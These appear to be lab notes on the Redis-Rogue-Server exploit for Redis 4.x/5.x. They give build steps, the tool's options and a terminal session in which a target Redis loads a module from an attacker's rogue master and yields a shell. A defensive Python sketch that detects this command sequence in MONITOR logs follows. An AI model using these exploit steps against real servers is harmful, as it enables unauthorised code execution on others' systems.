Using Redis-Rogue-Server

Compile the module first (a precompiled one is already included):

cd RedisModulesSDK/exp/
make
Usage: redis-master.py [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE] [-c COMMAND] [-a AUTH] [-v]

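Redis 4.x/5.x remote code execution (using RedisModules)
Option                Description
-h, --help            Show help message and exit
--rhost=REMOTE_HOST   Target host IP (required)
--rport=REMOTE_PORT   Target Redis port, default 6379
--lhost=LOCAL_HOST    Attacking server IP (required)
--lport=LOCAL_PORT    Attacking server listening port, default 21000
--exp=EXP_FILE        Redis module file to load, default exp.so
-v, --verbose         Show the full data stream (debug mode)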

0.1. Direct RCE

┌──(root㉿kali)-[~/Desktop/tools/Redis/redis-rogue-server]
└─# python3 redis-rogue-server.py --rhost 192.168.8.37 --lhost 192.168.8.10
/root/Desktop/tools/Redis/redis-rogue-server/redis-rogue-server.py:10: SyntaxWarning: invalid escape sequence '\ '
  BANNER = """______         _ _      ______                         _____
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 192.168.8.37:6379
[info] SERVER 192.168.8.10:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: i
[info] Interact mode start, enter "exit" to quit.
[<<] id
[>>] =uid=999(redis) gid=999(redis) groups=999(redis)
[<<] whoami
[>>] redis
[<<]
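
The stages logged above ("Setting master", "Setting dbfilename", "Loading module") can be spotted on the Redis side. The following detection sketch is an added example, not part of the original note or of the tool: it scans Redis MONITOR-format lines and alerts when a client repoints replication and then loads a module. It assumes those stages correspond to SLAVEOF/REPLICAOF, CONFIG SET dbfilename and MODULE LOAD; the sample lines and the 60-second window are constructed.

```python
import re

# Constructed sample in Redis MONITOR format: timestamp [db client] "cmd" "arg" ...
SAMPLE_MONITOR = '''\
1700000000.100000 [0 192.168.8.10:40112] "SLAVEOF" "192.168.8.10" "21000"
1700000000.250000 [0 192.168.8.10:40112] "CONFIG" "SET" "dbfilename" "exp.so"
1700000001.900000 [0 192.168.8.10:40112] "MODULE" "LOAD" "./exp.so"
1700000002.100000 [0 192.168.8.10:40112] "SLAVEOF" "NO" "ONE"
1700000050.000000 [0 10.0.0.5:51000] "CONFIG" "SET" "dbfilename" "dump.rdb"
1700000051.000000 [0 10.0.0.5:51000] "GET" "session:42"
'''

LINE_RE = re.compile(r'^(\d+\.\d+) \[\d+ ([^\]]+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
WINDOW_SECONDS = 60  # assumed correlation window, tune for your environment

def classify(args):
    """Map one command to a stage of the rogue-master chain, or None."""
    cmd = [a.lower() for a in args]
    if cmd[0] in ("slaveof", "replicaof") and cmd[1:3] != ["no", "one"]:
        return "set_master"
    if cmd[:3] == ["config", "set", "dbfilename"] and cmd[-1].endswith(".so"):
        return "so_dbfilename"
    if cmd[:2] == ["module", "load"]:
        return "module_load"
    return None

def detect(monitor_text, window=WINDOW_SECONDS):
    """Return alerts for clients that set a master and then load a module."""
    seen_by_client, alerts = {}, []
    for line in monitor_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client = float(m.group(1)), m.group(2).rsplit(":", 1)[0]
        args = ARG_RE.findall(m.group(3))
        stage = classify(args) if args else None
        if stage is None:
            continue
        seen = seen_by_client.setdefault(client, {})
        seen[stage] = ts
        if stage == "module_load" and ts - seen.get("set_master", -window - 1) <= window:
            alerts.append({"client": client, "module": args[2] if len(args) > 2 else None,
                           "so_dbfilename": "so_dbfilename" in seen})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_MONITOR):
        print(alert)
```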